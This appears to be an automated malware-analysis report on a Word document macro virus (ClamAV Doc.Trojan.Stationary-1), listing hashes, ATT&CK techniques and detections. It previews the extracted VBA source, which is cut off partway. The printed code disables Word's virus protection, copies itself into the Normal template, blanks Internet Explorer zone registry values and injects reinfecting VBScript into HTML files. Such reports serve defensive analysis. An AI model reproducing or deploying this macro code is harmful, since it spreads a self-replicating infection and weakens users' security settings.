Office (OLE) malware analysis — malicious · 41fc2c700affb4bc

MALICIOUS

Office (OLE)

35.5 KB Created: 2000-07-18 04:07:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: c44960f47547e0476c20394b1815e429 SHA-1: dfd412db6c2747463e23eca9314ee3cb067fb003 SHA-256: 41fc2c700affb4bc853fcfe9262941ea7a89acbe4a1dd8bbbd4712221ea0e695

220 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

The sample contains VBA macros that attempt to infect HTML files and modify registry keys related to internet settings and stationery folders. The macro code explicitly references `CreateObject("Scripting.FileSystemObject")` and `NormalTemplate.VBProject.VBComponents(1).CodeModule` for manipulation. The ClamAV detection `Doc.Trojan.Stationary-1` suggests a known malicious pattern. The primary intent appears to be spreading malicious content to HTML files and potentially altering system behavior to facilitate further execution.

Heuristics 4

ClamAV: Doc.Trojan.Stationary-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Stationary-1
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
GetObject call high OLE_VBA_GETOBJ

GetObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	22068 bytes
SHA-256: `e7daa070d9f9a55c6204b2bf3a5e577868b122e5b2a9294fd5d1e0411387b3a8`
Detection ClamAV: Doc.Trojan.Stationary-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Stationery 'by CyberShadow//SMF Private Sub Document_Close() With Application .EnableCancelKey = False .ScreenUpdating = False .ShowVisualBasicEditor = False End With With Options .ConfirmConversions = False .SaveNormalPrompt = False .VirusProtection = False End With Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule If NT.Lines(1, 1) <> "'Stationery" Then NT.DeleteLines 1, NT.CountOfLines NT.InsertLines 1, AD.Lines(1, AD.CountOfLines) End If If AD.Lines(1, 1) <> "'Stationery" Then AD.DeleteLines 1, AD.CountOfLines AD.InsertLines 1, NT.Lines(1, NT.CountOfLines) End If CrStr = getname() Call compile(CryptedString, CrStr) Call CorrectLine(CryptedString, CrStr) a = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Shared Tools\Stationery", "Stationery Folder") + "\" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "1201") = "" System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "1201") = "" Call infectHTML(a, CryptedString, CrStr) End Sub Private Sub infectHTML(a, CryptedString, CrStr) With Application.FileSearch .FileName = ".htm" .MatchAllWordForms = True .LookIn = a .SearchSubFolders = True .Execute For i = 1 To .FoundFiles.Count c = .FoundFiles(i) Open c For Input As 1 If LOF(1) > 55000 Then GoTo ExitRead e = "" Do While Not EOF(1) Line Input #1, a2 d = a2 If Len(d) >= 3 Then b = UCase(d) If b = "<HTML> <CYBERSHADOW...>" Then GoTo ExitRead If b = "<HTML>" Then b = "<html> <CyberShadow...>": d = b For j = 1 To Len(b) - 6 If Mid$(b, j, 8) = "</BODY>" Then d = Left$(b, j + 7) + Chr$(13) + Chr$(10) d = d + "<body>" + Chr$(13) + Chr$(10) d = d + "<script language=""VBScript"">" + Chr$(13) + Chr$(10) d = d + "<!--" + Chr$(13) + Chr$(10) d = d + "On Error Resume Next" + Chr$(13) + Chr$(10) d = d + CryptedString + Chr$(13) + Chr$(10) d = d + "Dim FSO" + Chr$(13) + Chr$(10) d = d + "Set FSO = CreateObject(""Scripting.FileSystemObject"")" + Chr$(13) + Chr$(10) d = d + "Set WordObj = GetObject("""", ""Word.Application""): Quit = 0" + Chr$(13) + Chr$(10) d = d + "If WordObj = """" Then" + Chr$(13) + Chr$(10) d = d + "Set WordObj = CreateObject(""Word.Application""): Quit = 1" + Chr$(13) + Chr$(10) d = d + "End If" + Chr$(13) + Chr$(10) d = d + "Set NT = WordObj.Templates(1).VBProject.VBComponents(1).Codemodule" + Chr$(13) + Chr$(10) d = d + "If NT.Lines(1, 1) <> ""'Stationery"" Then" + Chr$(13) + Chr$(10) d = d + "WordObj.Options.SaveNormalPrompt = False" + Chr$(13) + Chr$(10) d = d + "NT.DeleteLines 1, NT.CountOfLines" + Chr$(13) + Chr$(10) d = d + "NT.InsertLines 1," + CrStr + Chr$(13) + Chr$(10) d = d + "End If" + Chr$(13) + Chr$(10) d = d + "Set NT = Nothing" + Chr$(13) + Chr$(10) d = d + "If Quit = 1 Then WordObj.Quit" + Chr$(13) + Chr$(10) d = d + "--></script>" + Chr$(13) + Chr$(10) d = d + "</body>" + Chr$(13) + Chr$(10) j = j + 7 If (Len(b) - j - 7) > 0 Then d = d + Right$(b, Len(b) - j - 7) End If Next End If e = e + d + Chr$(13) + Chr$(10) Loop Close #1 Open c For Output As 1 Print #1, e ExitRead: Close #1 Next i End With End Sub Private Sub CorrectLine(CryptedString, CrStr) maxlen = Int(Rnd 100) + 100 c = "": l = 0: f2 = -1 For i = 1 To Len(CryptedString) b = Mid$(CryptedString, i, 1) If b = """" The ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.